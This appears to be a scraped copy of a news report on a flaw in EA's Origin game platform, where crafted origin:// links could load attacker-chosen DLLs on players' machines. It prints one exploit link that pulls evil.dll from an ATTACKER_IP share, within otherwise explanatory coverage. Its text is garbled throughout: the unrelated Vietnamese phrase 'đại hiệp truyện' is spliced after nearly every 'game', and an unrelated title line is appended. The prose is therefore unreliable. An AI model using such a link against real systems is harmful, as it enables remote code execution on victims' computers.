Bug in EA’s Origin game đại hiệp truyện platform allows attackers to hijack player PCs

Bug in EA’s Origin game đại hiệp truyện platform allows attackers to hijack player PCs

More than 40 million people could be affected by a vulnerability researchers uncovered in EA's Origin online game đại hiệp truyện platform allowing attackers to remotely execute malicious code on players' computers.

The attack, demonstrated on Friday at the Black Hat security conference in Amsterdam, takes just seconds to execute. In some cases, it requires no interaction by victims, researchers from Malta-based ReVuln (@revuln) told Ars. It works by manipulating the uniform resource identifiers EA's site uses to automatically start game đại hiệp truyệns on an end user's machine. By exploiting flaws in the Origin application available for both Macs and PCs, the technique turns EA's popular game đại hiệp truyện store into an attack platform that can covertly install malware on customers' computers.

"The Origin platform allows malicious users to exploit local vulnerabilities or features by abusing the Origin URI handling mechanism," ReVuln researchers Donato Ferrante and Luigi Auriemma wrote in apaper accompanying last week's demonstration. "In other words, an attacker can craft a malicious Internet link to execute malicious code remotely on [a] victim's system, which has Origin installed."

The researchers' demo shows them taking control of a computer that has the Origin client and Crysis 3 game đại hiệp truyện installed. Behind the scenes, the EA platform uses the origin://Launchgame đại hiệp truyện/71503 link to activate the game đại hiệp truyện. When a targeted user instead clicks on a URI such as origin://Launchgame đại hiệp truyện/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll, the Origin client will load a Windows dynamic link library file of the attackers' choosing on the victim's computer.

Update: "Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure," an EA spokesman wrote in an e-mail to Ars.

The attack is similar to an exploit the same researchers demonstrated in October on Steam, a competing online game đại hiệp truyện platform from Valve, with 50 million users. The earlier attack relied on booby-trapped URLs starting with "Steam://" to trick browsers, game đại hiệp truyệns, e-mail clients, and other applications into executing code that could compromise the security of the underlying computer. At the time, the researchers advised vulnerable end users to protect themselves against exploits by disabling the automatic launching of Steam:// URLs.

The Origin attack works much the same. It exploits the functionality that allows sites to start game đại hiệp truyệns remotely. By modifying the variables in the underlying URI links, the commands to start a game đại hiệp truyện can be replaced with instructions that cause a computer to install a malicious program instead. One such command, which was included in the demo, is related to the OpenAutomate standard used in software provided with graphics cards from Nvidia. The technique works against people who have installedCrysis 3 and a variety of other game đại hiệp truyệns. Other techniques work against machines with different titles installed.

When an origin:// link is opened for the first time, browsers will typically ask if a user wants it to open in the Origin client, which is the registered application for such URLs. Different browsers handle these links differently, with some displaying full paths, others showing only parts of them, and still others not displaying the URL at all. Some confirmation prompts give users the option of using the Origin client to open all origin:// links encountered in the future. Many game đại hiệp truyệnrs choose this setting so they aren't prompted in the future. Those users who have selected this setting may not be required to take any interaction to be attacked. Users who want to protect themselves should make sure they are prompted before Origin links are processed.
Đại Hiệp Truyện - Thiên Cổ Đại Hiệp Mộng - Thần Điêu Hiệp Lữ Tình